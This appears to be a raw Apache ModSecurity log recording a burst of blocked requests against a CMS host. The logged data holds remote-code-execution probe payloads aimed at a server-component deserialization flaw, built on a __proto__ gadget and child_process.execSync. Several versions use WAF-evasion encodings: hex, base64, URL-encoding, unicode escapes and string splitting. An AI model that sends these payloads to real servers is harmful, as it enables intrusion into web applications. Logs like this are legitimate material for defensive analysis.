172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('chi' 'ld_' 'pro' 'cess').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxCj-HYEhJWFlG6ErggAAAEc"] [Sun Apr 05 15:42:28.275455 2026] [:error] [pid 23077:tid 23106] [client 172.94.9.253:40424] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:0 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxJc83uMXRUE9zvQScQAAAdc"] [Sun Apr 05 15:42:28.396537 2026] [:error] [pid 22788:tid 22804] [client 172.94.9.253:40498] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(decodeURIComponent(decodeURIComponent('echo%20%24%28%2841%2A271%29%29'))).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_c..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxCLbhFL16Wsx-C9C9AAAAY4"] [Sun Apr 05 15:42:28.396608 2026] [:error] [pid 23077:tid 23098] [client 172.94.9.253:40464] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:__proto__:then\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22resolved_model\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu006c\\x5cu0075\\x5cu0065\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim(..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxJc83uMXRUE9zvQScgAAAc8"] [Sun Apr 05 15:42:28.396976 2026] [:error] [pid 23077:tid 23089] [client 172.94.9.253:40530] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('6563686f2024282834312a3237312929','hex').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxJc83uMXRUE9zvQScwAAAcY"] [Sun Apr 05 15:42:28.398007 2026] [:error] [pid 13019:tid 13261] [client 172.94.9.253:40504] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var\\x5ctres=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw\\x5ctObject.assign(new\\x5ctError('NEXT_REDIRECT'),{digest:\\x5ct`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxLxQSOrq_iRTM7do5wAAARU"] [Sun Apr 05 15:42:28.398629 2026] [:error] [pid 13019:tid 13263] [client 172.94.9.253:40572] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxLxQSOrq_iRTM7do6AAAARc"] [Sun Apr 05 15:42:28.407823 2026] [:error] [pid 23077:tid 23097] [client 172.94.9.253:40482] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('ZWNobyAkKCg0MSoyNzEpKQ==','base64').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxJc83uMXRUE9zvQSdAAAAc4"] [Sun Apr 05 15:42:28.408289 2026] [:error] [pid 1503:tid 1540] [client 172.94.9.253:40520] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxEI7AjfUQYCN-J7DVAAAANg"] [Sun Apr 05 15:42:28.409242 2026] [:error] [pid 31198:tid 31268] [client 172.94.9.253:40558] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var/*bypass*/res=process.mainModule.require(/*waf*/'child_process'/*bypass*/).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_f..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxDT5TgrBR8xRnfXAzQAAAVA"] [Sun Apr 05 15:42:28.409654 2026] [:error] [pid 1503:tid 1511] [client 172.94.9.253:40480] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(decodeURIComponent(decodeURIComponent('echo%20%24%28%2841%2A271%29%29'))).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_c..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxEI7AjfUQYCN-J7DVQAAAMI"] [Sun Apr 05 15:42:28.410756 2026] [:error] [pid 23077:tid 23086] [client 172.94.9.253:40546] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('powershell -c \\x2241*271\\x22').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxJc83uMXRUE9zvQSdgAAAcM"] [Sun Apr 05 15:42:28.499331 2026] [:error] [pid 23077:tid 23084] [client 172.94.9.253:40612] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require(['child','_','process'].join('')).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxJc83uMXRUE9zvQSeAAAAcE"] [Sun Apr 05 15:42:28.499413 2026] [:error] [pid 23077:tid 23107] [client 172.94.9.253:40592] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:\\x5cu005f\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu006f\\x5cu0074\\x5cu006f\\x5cu005f\\x5cu005f:\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5cu006c\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu0..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxJc83uMXRUE9zvQSdwAAAdg"] [Sun Apr 05 15:42:28.500010 2026] [:error] [pid 31198:tid 31263] [client 172.94.9.253:40588] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var/*bypass*/res=process.mainModule.require(/*waf*/'child_process'/*bypass*/).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_f..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxDT5TgrBR8xRnfXAzgAAAUs"] [Sun Apr 05 15:42:28.501147 2026] [:error] [pid 13019:tid 13260] [client 172.94.9.253:40594] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxLxQSOrq_iRTM7do6gAAARQ"] [Sun Apr 05 15:42:28.513083 2026] [:error] [pid 13019:tid 13256] [client 172.94.9.253:40626] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:0 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxLxQSOrq_iRTM7do6wAAARA"] [Sun Apr 05 15:42:28.513337 2026] [:error] [pid 23077:tid 23104] [client 172.94.9.253:40606] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var r=process.mainModule.require('child_process').spawnSync('sh',['-c','echo $((41*271))']);var res=r.stdout.toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxJc83uMXRUE9zvQSeQAAAdU"] [Sun Apr 05 15:42:28.513342 2026] [:error] [pid 22788:tid 22814] [client 172.94.9.253:40628] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxCLbhFL16Wsx-C9C9QAAAZg"] [Sun Apr 05 15:42:28.514192 2026] [:error] [pid 13019:tid 13245] [client 172.94.9.253:40608] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:\\x5cu005f\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu006f\\x5cu0074\\x5cu006f\\x5cu005f\\x5cu005f:\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5cu006c\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu0..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxLxQSOrq_iRTM7do7AAAAQU"] [Sun Apr 05 15:42:28.514943 2026] [:error] [pid 13019:tid 13264] [client 172.94.9.253:40586] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match 